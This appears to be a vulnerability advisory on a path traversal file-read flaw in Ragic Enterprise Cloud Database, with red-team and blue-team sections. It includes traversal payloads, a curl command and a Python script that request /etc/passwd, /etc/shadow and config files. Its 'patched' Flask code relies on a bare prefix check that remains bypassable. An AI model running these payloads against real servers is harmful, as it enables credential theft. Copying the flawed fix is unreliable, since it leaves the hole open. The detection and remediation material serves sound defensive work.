CVE-2025-15015
Executive Summary
CVE-2025-15015 is a critical Arbitrary File Read vulnerability in Ragic Enterprise Cloud Database. An unauthenticated, remote attacker can exploit a Relative Path Traversal flaw to download arbitrary system files from the underlying server. This vulnerability poses a severe risk to data confidentiality, as it can lead to the exposure of sensitive configuration files, credentials, and proprietary data. No patch is currently available, and no public proof-of-concept (PoC) code has been released. The vulnerability is classified under CWE-23 (Relative Path Traversal) and is mapped to MITRE ATT&CK tactic T1190 (Exploit Public-Facing Application).

Supply Chain & Package Security
This vulnerability is not related to an open-source package manager (NPM, PyPI, Go, Ruby). It affects a proprietary enterprise cloud database product. Supply chain risk is limited to the direct deployment of the Ragic Enterprise Cloud Database software.
CVSS Breakdown & Threat Level
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- Base Score: 7.5 (High)
- Attack Vector: Network (AV:N)
- Attack Complexity: Low (AC:L)
- Privileges Required: None (PR:N)
- User Interaction: None (UI:N)
- Scope: Unchanged (S:U)
- Confidentiality Impact: High (C:H)
- Integrity Impact: None (I:N)
- Availability Impact: None (A:N)
Threat Level: High. The vulnerability is easily exploitable remotely without authentication, and the impact on confidentiality is severe. The lack of a patch increases the risk significantly.
Deep Dive & Mechanics
The vulnerability resides in the file retrieval functionality of the Ragic Enterprise Cloud Database. The application fails to properly sanitize user-supplied input used to construct file paths. By injecting relative path traversal sequences (e.g., ../), an unauthenticated attacker can navigate outside the intended web root directory and read arbitrary files on the server's filesystem.
Root Cause: The application uses user input to build a file path without validating that the final path remains within an allowed directory. This allows an attacker to traverse up the directory tree.
Attack Vector: An HTTP request to a vulnerable endpoint (likely a file download or export function) with a manipulated path or file parameter.
Example Request:
GET /download?file=../../../etc/passwd HTTP/1.1
Host: target.ragic.com
The server would then read and return the contents of /etc/passwd.
Vulnerable vs. Patched Code
Since no patch is available, a hypothetical vulnerable code snippet and its patched counterpart are provided for illustrative purposes.
Vulnerable Code (Python/Flask example):
from flask import Flask, request, send_file
import os
app = Flask(__name__)
@app.route('/download')
def download_file():
filename = request.args.get('file')
# VULNERABLE: No path validation
filepath = os.path.join('/var/www/ragic/uploads', filename)
return send_file(filepath)
Patched Code (Python/Flask example):
from flask import Flask, request, send_file, abort
import os
app = Flask(__name__)
ALLOWED_DIR = os.path.abspath('/var/www/ragic/uploads')
@app.route('/download')
def download_file():
filename = request.args.get('file')
filepath = os.path.abspath(os.path.join(ALLOWED_DIR, filename))
# PATCHED: Ensure the resolved path is within the allowed directory
if not filepath.startswith(ALLOWED_DIR):
abort(403)
return send_file(filepath)
Exploitation & Lab Setup
Red Team
Objective: Exploit the vulnerability to read sensitive files (e.g., /etc/passwd, configuration files, database credentials).
Lab Setup:
- Deploy a vulnerable instance of Ragic Enterprise Cloud Database (version unknown).
- Identify the vulnerable endpoint (e.g.,
/download,/export,/file). - Use a tool like
curlor Burp Suite to send crafted requests.
Exploitation Steps:
- Reconnaissance: Identify the vulnerable parameter. Common parameters include
file,path,download,filename. - Craft Payload: Use relative path traversal sequences.
../../../etc/passwd ../../../../etc/shadow ../../../../var/log/apache2/access.log - Execute:
curl -v "http://target.ragic.com/download?file=../../../etc/passwd" - Extract Data: The server will return the contents of the requested file.
Automation (Python script):
import requests
target = "http://target.ragic.com"
endpoint = "/download"
payloads = [
"../../../etc/passwd",
"../../../etc/shadow",
"../../../etc/nginx/nginx.conf",
"../../../var/www/ragic/config.php"
]
for payload in payloads:
url = f"{target}{endpoint}?file={payload}"
response = requests.get(url)
if response.status_code == 200 and len(response.text) > 0:
print(f"[+] Success: {payload}")
print(response.text[:500])
Blue Team
Objective: Detect and block exploitation attempts.
Detection:
- Web Server Logs: Monitor for multiple
../sequences in request parameters. - WAF Rules: Block requests containing
../or..\\in file-related parameters. - File Integrity Monitoring: Alert on unexpected reads of sensitive system files.
Mitigation:
- Input Validation: Implement strict allowlisting of allowed file paths.
- Path Canonicalization: Use
realpath()oros.path.abspath()and verify the resolved path is within the intended directory. - Least Privilege: Run the application with minimal filesystem permissions.
- Network Segmentation: Restrict access to the application from untrusted networks.
Indicators of Compromise (IOCs)
Network IOCs:
- HTTP requests with multiple
../sequences in the URI. - Requests to endpoints like
/download,/export,/filewith suspicious parameters. - Outbound data transfers containing contents of system files (e.g.,
root:x:0:0:root:/root:/bin/bash).
- HTTP requests with multiple
File System IOCs:
- Unauthorized access to
/etc/passwd,/etc/shadow,/etc/nginx/nginx.conf, application configuration files. - Unexpected file reads logged by the operating system (e.g., auditd logs).
- Unauthorized access to
Log IOCs:
- Web server access logs showing
200responses to path traversal payloads. - Error logs indicating attempts to read files outside the web root.
- Web server access logs showing

Remediation & Mitigation
Immediate Actions:
- Disable Vulnerable Endpoints: If possible, temporarily disable the file download/export functionality.
- Implement WAF Rules: Deploy a Web Application Firewall (WAF) to block path traversal patterns.
- Network Segmentation: Restrict access to the Ragic application to trusted IP addresses only.
Long-Term Fixes:
- Vendor Patch: Await an official patch from Ragic. Monitor their security advisories.
- Code Hardening: If you have access to the source code, implement proper input validation and path canonicalization as shown in the patched code example.
- Regular Security Audits: Conduct penetration testing and code reviews to identify similar vulnerabilities.
Workaround:
- Use a reverse proxy (e.g., Nginx) to rewrite or block requests containing path traversal sequences.
